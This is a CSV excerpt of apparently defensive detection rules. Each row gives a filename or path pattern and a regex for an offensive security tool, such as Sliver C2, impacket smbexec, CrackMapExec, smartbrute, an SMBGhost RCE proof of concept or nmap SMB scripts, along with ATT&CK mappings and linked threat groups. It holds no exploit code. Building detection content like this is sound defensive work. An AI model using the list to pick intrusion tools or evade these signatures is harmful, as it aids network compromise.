"*/sliver-server_linux*",".{0,1000}\/sliver\-server_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","11345"
"*/SlowPathMITM.py*",".{0,1000}\/SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","11346"
"*/SmallSecretsDump.py*",".{0,1000}\/SmallSecretsDump\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","1","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","11347"
"*/smartbrute.git*",".{0,1000}\/smartbrute\.git.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","11348"
"*/smartbrute-main*",".{0,1000}\/smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#linux","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","11349"
"*/smb.py*",".{0,1000}\/smb\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11350"
"*/smb/psexec.rb*",".{0,1000}\/smb\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-PsExec.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","11351"
"*/SMB_RPC/*.py",".{0,1000}\/SMB_RPC\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11352"
"*/smb2-capabilities.nse*",".{0,1000}\/smb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11353"
"*/smb2-security-mode.nse*",".{0,1000}\/smb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11354"
"*/smb2-time.nse*",".{0,1000}\/smb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11355"
"*/smb2-vuln-uptime.nse*",".{0,1000}\/smb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11356"
"*/smb3.py*",".{0,1000}\/smb3\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11357"
"*/smb-brute.nse*",".{0,1000}\/smb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11358"
"*/smbclient.exe*",".{0,1000}\/smbclient\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","risk of false positives","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11359"
"*/smbclient.py*",".{0,1000}\/smbclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11360"
"*/smb-cmds.txt*",".{0,1000}\/smb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11361"
"*/SMBCrunch.git*",".{0,1000}\/SMBCrunch\.git.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11362"
"*/smb-double-pulsar-backdoor.nse*",".{0,1000}\/smb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11363"
"*/SMBeagle*",".{0,1000}\/SMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","11364"
"*/smb-enum-domains.nse*",".{0,1000}\/smb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11365"
"*/smb-enum-groups.nse*",".{0,1000}\/smb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11366"
"*/smb-enum-processes.nse*",".{0,1000}\/smb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11367"
"*/smb-enum-services.nse*",".{0,1000}\/smb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11368"
"*/smb-enum-sessions.nse*",".{0,1000}\/smb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11369"
"*/smb-enum-shares.nse*",".{0,1000}\/smb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11370"
"*/smb-enum-users.nse*",".{0,1000}\/smb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11371"
"*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","11372"
"*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11373"
"*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","11374"
"*/smb-flood.nse*",".{0,1000}\/smb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11375"
"*/SMBForwarder.txt*",".{0,1000}\/SMBForwarder\.txt.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","11376"
"*/SMBGhost/scanner.py*",".{0,1000}\/SMBGhost\/scanner\.py.{0,1000}","offensive_tool_keyword","SMBGhost","Simple scanner for CVE-2020-0796 - SMBv3 RCE.","T1210 - T1573 - T1553 - T1216 - T1027","TA0006 - TA0011 - TA0008","N/A","N/A","Discovery","https://github.com/ollypwn/SMBGhost","1","1","N/A","N/A","7","7","678","194","2020-10-01T08:36:29Z","2020-03-11T15:21:27Z","11377"
"*/SMBGhost_RCE*",".{0,1000}\/SMBGhost_RCE.{0,1000}","offensive_tool_keyword","SMBGhost_RCE_PoC","RCE PoC for CVE-2020-0796 SMBGhost","T1210 - T1059 - T1505 - T1021 - T1027","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/chompie1337/SMBGhost_RCE_PoC","1","1","N/A","N/A","N/A","10","1339","349","2020-07-02T18:51:47Z","2020-06-02T00:14:47Z","11378"
"*/SMBGrab.pl*",".{0,1000}\/SMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11379"
"*/SMBHunt.pl*",".{0,1000}\/SMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11380"
"*/smbldap.py*",".{0,1000}\/smbldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","11381"
"*/SMBList.pl*",".{0,1000}\/SMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","11382"
"*/smblogin.ps1*",".{0,1000}\/smblogin\.ps1.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","11383"
"*/smb-ls.nse*",".{0,1000}\/smb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11384"
"*/smbmap.git*",".{0,1000}\/smbmap\.git.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","1","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","11385"
"*/smbmap.py*",".{0,1000}\/smbmap\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11386"
"*/smbmapDump*",".{0,1000}\/smbmapDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","11387"
"*/smb-mbenum.nse*",".{0,1000}\/smb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11388"
"*/smb-os-discovery.nse*",".{0,1000}\/smb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11389"
